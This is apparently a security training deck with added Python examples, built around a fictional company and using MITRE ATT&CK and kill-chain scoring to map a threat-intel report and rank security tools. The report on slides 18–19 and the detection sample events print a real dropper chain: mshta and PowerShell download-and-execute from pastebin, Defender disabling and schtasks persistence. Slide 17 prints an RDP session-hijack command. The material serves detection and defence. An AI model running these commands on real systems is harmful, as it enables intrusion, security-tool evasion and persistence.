  • 8. What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
  • 9. There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
  • 10. MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
  • 11. The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
  • 13. Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
  • 14. Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
  • 15. Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
  • 17. T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
  • 18. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
• 19. Scenario 2: Threat Intel Report (the same dropper report as on slide 18, mapped to ATT&CK)
• T1193: Spearphishing Attachment
• T1089: Disabling Security Tools
• T1170: Mshta
• T1481: Web Service
• T1053: Scheduled Task
• T1027: Obfuscated Files or Information
• T1064: Scripting
• T1086: PowerShell
• T1112: Modify Registry
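The detection advice on slides 17 and 19, turned into rules and run over endpoint events, as an added example (written for this edit; it is not the deck's code and not any vendor's). The event schema (process_create, service_install and registry_set records with the field names used below) and every sample event are constructed for the example; the PowerShell sample writes the pastebin URL out plainly where the slide shows it assembled from single characters. The rules are tagged with the technique IDs the deck uses, so the last step can ask the deck's own question: which of the report's techniques would this telemetry have surfaced, and which need a different data source?

```python
"""Added example: slide-17 and slide-19 indicators as rules over constructed endpoint
events. Event schema, field names and sample events are constructed, not real logs."""
import re


def _ci(pattern, text):
    """Case-insensitive regex search (Windows command lines vary in case)."""
    return re.search(pattern, text, re.IGNORECASE) is not None


def _image_is(event, name):
    return event["image"].lower().endswith(name)


# (rule name, ATT&CK technique IDs as the deck labels them, event type, predicate)
RULES = [
    # Slide 17: service whose binary is "cmd.exe /k|/c ... tscon <id> /dest:console".
    # The service matters: tscon attaches another user's session without a password
    # only when running as SYSTEM, which a service started by the SCM provides.
    ("rdp_hijack_service", ["T1076"], "service_install",
     lambda e: _ci(r"\bcmd\.exe\s+/[kc]\b", e["image_path"])
               and _ci(r"\btscon\b.*/dest:console", e["image_path"])),
    ("tscon_executed", ["T1076"], "process_create",
     lambda e: _image_is(e, "tscon.exe")),
    # Slide 19, 1st stage: mshta.exe pulling a remote HTA.
    ("mshta_remote_url", ["T1170"], "process_create",
     lambda e: _image_is(e, "mshta.exe") and _ci(r"https?://", e["command_line"])),
    # Steps 1 and 3: Defender signatures removed, Defender UI killed.
    ("defender_definitions_removed", ["T1089"], "process_create",
     lambda e: _image_is(e, "mpcmdrun.exe") and _ci(r"-removedefinitions", e["command_line"])),
    ("defender_ui_killed", ["T1089"], "process_create",
     lambda e: _image_is(e, "taskkill.exe") and _ci(r"/im\s+msascuil\.exe", e["command_line"])),
    # Steps 4 and 6: Protected View switched off, Run key written.
    ("protected_view_disabled", ["T1112"], "registry_set",
     lambda e: _ci(r"\\Security\\ProtectedView\\DisableUnsafeLocationsInPV$", e["target_object"])),
    ("run_key_written", ["T1112"], "registry_set",
     lambda e: _ci(r"\\CurrentVersion\\Run\\", e["target_object"])),
    # Step 5: PowerShell under mshta, loading a base64 assembly fetched at run time.
    ("mshta_spawns_powershell", ["T1170", "T1086"], "process_create",
     lambda e: e["parent_image"].lower().endswith("mshta.exe") and _image_is(e, "powershell.exe")),
    ("reflective_assembly_load", ["T1086", "T1027"], "process_create",
     lambda e: _image_is(e, "powershell.exe") and _ci(r"Reflection\.Assembly\]::Load", e["command_line"])
               and _ci(r"FromBase64String", e["command_line"])),
    # Step 6: scheduled task whose action is mshta.
    ("schtasks_runs_mshta", ["T1053", "T1170"], "process_create",
     lambda e: _image_is(e, "schtasks.exe") and _ci(r"/create\b", e["command_line"])
               and _ci(r'/tr\s+"?mshta', e["command_line"])),
]

# Constructed sample: two benign records, the slide-17 hijack, then the slide-19 chain.
# URLs stay defanged as on the slides.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe notes.txt"},
    {"type": "service_install", "service_name": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\agent.exe"},
    {"type": "service_install", "service_name": "sesshijack",
     "image_path": "cmd.exe /k tscon 4 /dest:console"},
    {"type": "process_create", "image": r"C:\Windows\System32\tscon.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": "tscon 4 /dest:console"},
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe http://www.tinyurl[.]com/shlsqd"},
    {"type": "process_create", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "MpCmdRun.exe -RemoveDefinitions -DynamicSignatures"},
    {"type": "process_create", "image": r"C:\Windows\System32\taskkill.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe", "command_line": "taskkill /f /im MSASCuiL.exe"},
    {"type": "registry_set", "details": "DWORD (0x00000001)",
     "target_object": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV"},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     # the slide shows the URL concatenated character by character; written plainly here
     "command_line": "powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String("
                     "(New-Object Net.WebClient).DownloadString('https://pastebin[.]com/raw/dhVymUy3')))"},
    {"type": "registry_set", "details": 'schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta ..."',
     "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate"},
    {"type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" '
                     '/tr "mshta vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe '
                     'https://pastebin[.]com/raw/df861P8c"",0,true)(window.close)" /F'},
]

# Slide 19's ATT&CK mapping of the report, used as the yardstick.
REPORT_TECHNIQUES = ["T1193", "T1089", "T1170", "T1481", "T1053", "T1027", "T1064", "T1086", "T1112"]


def match_events(events, rules=RULES):
    """Every (rule name, technique IDs, event) where a rule fires on an event of its type."""
    return [(name, techniques, e) for e in events
            for name, techniques, etype, pred in rules if e["type"] == etype and pred(e)]


def observed_techniques(hits):
    return sorted({t for _, techniques, _ in hits for t in techniques})


def coverage(hits, expected=REPORT_TECHNIQUES):
    """Report techniques the rules surfaced, and those they cannot see from this telemetry."""
    seen = set(observed_techniques(hits))
    return [t for t in expected if t in seen], [t for t in expected if t not in seen]


if __name__ == "__main__":
    hits = match_events(SAMPLE_EVENTS)
    for name, techniques, e in hits:
        what = e.get("command_line") or e.get("image_path") or e.get("target_object")
        print(f"{name:30} {','.join(techniques):12} {what}")
    covered, missed = coverage(hits)
    print("covered:", covered)
    print("missed (needs mail, proxy or script-block telemetry):", missed)
```

On the sample, every rule fires once and the three techniques left uncovered are the ones process and registry telemetry cannot see on their own: the phishing attachment (T1193), the web-service hosting (T1481) and the script content itself (T1064). That gap, not the ten hits, is the number to carry into the maturity and toolset scoring later in the deck.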
• 21. Maturity
• 0 = We do nothing
• 1 = Locally logged: relevant data is captured on the endpoint
• 2 = Centrally logged: data is gathered centrally
• 3 = Correlated / enriched: logs for the event are enriched with data from other sources to increase fidelity
• 4 = Alerting: we have rules to detect anomalies and suspicious events
• 5 = Playbook exists: a process to respond exists (incl. analyse, contain, eradicate, recover)
• 6 = Response is automated: we have an automated response for this alert
• 23. Scenario 3: It’s all about the money
• There is an ongoing trade war between the two biggest economies in the world
• Unfortunately this has an impact on the wealthiest people, who are Sense//Net Library’s customers
• A few of them decided to put their AI constructs to sleep until better times come, hence your profits decrease
• The management decided it’s time to cut costs and your department needs to participate
• You don’t want to cut people – they are a great team – so you focus on the vendor contracts that are up for renewal this year: which security control can you afford to get rid of?
• 24. Measure effectiveness of the toolset
• Rows: the shortlisted MITRE ATT&CK techniques (a subset of those mapped from the Scenario 2 report): T1193: Spearphishing Attachment, T1089: Disabling Security Tools, T1112: Modify Registry, T1086: PowerShell, T1053: Scheduled Task
• Columns: the current toolset (Tool1 to Tool8), each tool scored in the kill-chain column it serves:
  • Early warning (Reconnaissance): [2] Would Warn of Activity, [0] N/A
  • Inbound Protect (Weaponization, Delivery): [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
  • Detect (Weaponization, Delivery, C2): [2] Would Detect Activity, [0] No Detection or N/A
  • Outbound Protect (Exploit, Installation, C2, AOO): [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 25. Measure effectiveness of the toolset: current toolset measure
Technique                        Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8   Current  Proposed
T1193: Spearphishing Attachment    0     0     2     1     2     0     2     1        8         7
T1089: Disabling Security Tools    2     0     0     2     2     0     2     1        9         8
T1112: Modify Registry             0     0     2     1     2     0     2     1        8         7
T1086: PowerShell                  2     0     0     2     2     0     2     1        9         8
T1053: Scheduled Task              2     0     2     1     0     2     2     1       10         7
Total                                                                                44        37
Relative to current                                                                100%       84%
• Scoring per column: Early warning (Reconnaissance) [2] Would Warn of Activity, [0] N/A; Inbound Protect (Weaponization, Delivery) [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity; Detect (Weaponization, Delivery, C2) [2] Would Detect Activity, [0] No Detection or N/A; Outbound Protect (Exploit, Installation, C2, AOO) [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity.
• The Proposed column is the score left after the contracts chosen for retirement are removed; its figures equal the Current figures minus the Tool6 and Tool8 columns (Tool2 scores 0 on every technique, so keeping or dropping it changes nothing).
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 26. Scenario 4: Let’s go shopping
• Times are changing and the company’s profits have picked up
• You successfully argued for a bigger budget and now you can spend some money on a new security control
• Your team shortlisted a few vendors and you’ve conducted a PoC
• The results show that there are a few differences between the products
• The procurement team negotiated nearly identical prices for the products
• 27. Measure effectiveness of the toolset: current vs future toolset measure (previous compared to Proposed A and B)
Technique                        Tool1 Tool3 Tool4 Tool5 Tool7 | ToolA ToolB | Current  ProposedA  ProposedB
T1193: Spearphishing Attachment    0     2     1     2     2   |   2     0   |    7         9          7
T1089: Disabling Security Tools    2     0     2     2     2   |   0     2   |    8         8         10
T1112: Modify Registry             0     2     1     2     2   |   2     0   |    7         9          7
T1086: PowerShell                  2     0     2     2     2   |   0     0   |    8         8          8
T1053: Scheduled Task              2     2     1     0     2   |   2     0   |    7         9          7
Total                                                                           37        43         39
Relative to current (37)                                                      100%      116%       105%
Relative to the pre-cut toolset (44)                                            44        43         39
                                                                              100%       98%        89%
• The Current columns are the toolset left after Scenario 3: the slide carries no scores for Tool2, Tool6 and Tool8, and the remaining values match the Tool1, Tool3, Tool4, Tool5 and Tool7 columns of slide 25. ToolA and ToolB are scored [2] Proposal Applicable, [0] N/A.
• Scoring per column for the existing tools: Early warning (Reconnaissance) [2] Would Warn of Activity, [0] N/A; Inbound Protect (Weaponization, Delivery) [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity; Detect (Weaponization, Delivery, C2) [2] Would Detect Activity, [0] No Detection or N/A; Outbound Protect (Exploit, Installation, C2, AOO) [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity.
• ToolA scores higher overall, but ToolB is the only one that adds anything on T1089; which matters depends on where the maturity ladder says the team is weakest, not on the total alone.
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 29. Putting it all together
• Vulnerability reports
• Threat Intel reports
• Toolset effectiveness
• Response maturity
• ...
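The arithmetic of slides 25 and 27 and the maturity ladder of slide 21, as an added example that is not the deck's code: the tool-by-technique scores are typed in from the slides, the Scenario 3 search tries retiring each tool in turn, the Scenario 4 comparison adds each candidate to the post-cut toolset, and a final pass crosses the toolset score with response maturity. The per-technique maturity levels (SAMPLE_MATURITY) and the "alerting or better" threshold are assumptions of the example; the deck gives only the scale.

```python
"""Added example: toolset effectiveness and response maturity per ATT&CK technique.
Matrix and candidate scores are from slides 25 and 27; SAMPLE_MATURITY is assumed."""

TOOLS = ["Tool1", "Tool2", "Tool3", "Tool4", "Tool5", "Tool6", "Tool7", "Tool8"]

# Slide 25 "Current": each tool's score ([0], [1] or [2]) per technique, in TOOLS order.
CURRENT = {
    "T1193: Spearphishing Attachment": [0, 0, 2, 1, 2, 0, 2, 1],
    "T1089: Disabling Security Tools": [2, 0, 0, 2, 2, 0, 2, 1],
    "T1112: Modify Registry":          [0, 0, 2, 1, 2, 0, 2, 1],
    "T1086: PowerShell":               [2, 0, 0, 2, 2, 0, 2, 1],
    "T1053: Scheduled Task":           [2, 0, 2, 1, 0, 2, 2, 1],
}

# Slide 27 candidates: [2] Proposal Applicable / [0] N/A per technique.
CANDIDATES = {
    "ToolA": {"T1193: Spearphishing Attachment": 2, "T1089: Disabling Security Tools": 0,
              "T1112: Modify Registry": 2, "T1086: PowerShell": 0, "T1053: Scheduled Task": 2},
    "ToolB": {"T1193: Spearphishing Attachment": 0, "T1089: Disabling Security Tools": 2,
              "T1112: Modify Registry": 0, "T1086: PowerShell": 0, "T1053: Scheduled Task": 0},
}

# Slide 21 maturity ladder.
MATURITY_LEVELS = {0: "We do nothing", 1: "Locally logged", 2: "Centrally logged",
                   3: "Correlated / enriched", 4: "Alerting", 5: "Playbook exists",
                   6: "Response is automated"}

# Assumed sample of where a team stands per technique (NOT from the deck).
SAMPLE_MATURITY = {"T1193: Spearphishing Attachment": 4, "T1089: Disabling Security Tools": 2,
                   "T1112: Modify Registry": 1, "T1086: PowerShell": 5, "T1053: Scheduled Task": 3}


def technique_scores(matrix, keep=None, tools=TOOLS):
    """Sum each technique's row over the tools in `keep` (default: every tool)."""
    idx = [i for i, t in enumerate(tools) if keep is None or t in keep]
    return {tech: sum(row[i] for i in idx) for tech, row in matrix.items()}


def total(scores):
    return sum(scores.values())


def pct(value, base):
    """Whole-number percentage, as the slides print it."""
    return round(100 * value / base)


def retirement_options(matrix, tools=TOOLS):
    """Scenario 3: score retained if one tool is dropped, best first (ties keep TOOLS order)."""
    base = total(technique_scores(matrix))
    options = []
    for tool in tools:
        kept = total(technique_scores(matrix, keep=[t for t in tools if t != tool]))
        options.append((tool, kept, pct(kept, base)))
    return sorted(options, key=lambda o: -o[1])


def evaluate_candidate(matrix, candidate, keep=None):
    """Scenario 4: per-technique score of the kept toolset plus one candidate tool."""
    base = technique_scores(matrix, keep=keep)
    return {tech: score + candidate[tech] for tech, score in base.items()}


def readiness(scores, maturity, alert_level=4):
    """Cross toolset score with the maturity ladder. A technique the tools would block
    or detect but nobody alerts on (maturity below `alert_level`) is a gap the toolset
    score alone hides; the threshold is this example's assumption."""
    return [(tech, score, maturity[tech], MATURITY_LEVELS[maturity[tech]],
             score > 0 and maturity[tech] < alert_level)
            for tech, score in scores.items()]


if __name__ == "__main__":
    current = technique_scores(CURRENT)
    print("Current toolset:", total(current))                                  # 44
    for tool, kept, p in retirement_options(CURRENT):
        print(f"  drop {tool}: {kept} ({p}%)")
    remaining = [t for t in TOOLS if t not in ("Tool6", "Tool8")]             # slide-25 Proposed
    after_cut = technique_scores(CURRENT, keep=remaining)
    print("After Scenario 3:", total(after_cut), f"({pct(total(after_cut), 44)}%)")  # 37 (84%)
    for name, cand in CANDIDATES.items():
        s = total(evaluate_candidate(CURRENT, cand, keep=remaining))
        print(f"  + {name}: {s} ({pct(s, 37)}% of current, {pct(s, 44)}% of pre-cut)")
    for tech, score, level, label, gap in readiness(after_cut, SAMPLE_MATURITY):
        print(f"  {tech}: tools={score} maturity={level} ({label}){'  <- no alerting' if gap else ''}")
```

Run stand-alone it reproduces the slides' 44, 37 (84%), 43 (116% / 98%) and 39 (105% / 89%), and the retirement search ranks Tool2, Tool6 and Tool8 as the three cheapest drops in coverage terms, which is the combination the Proposed column on slide 25 corresponds to. The readiness pass is the "putting it all together" step: with the assumed maturity levels, three of the five techniques are covered by tools but sit below the alerting rung, so the toolset number on its own would overstate how ready the team is.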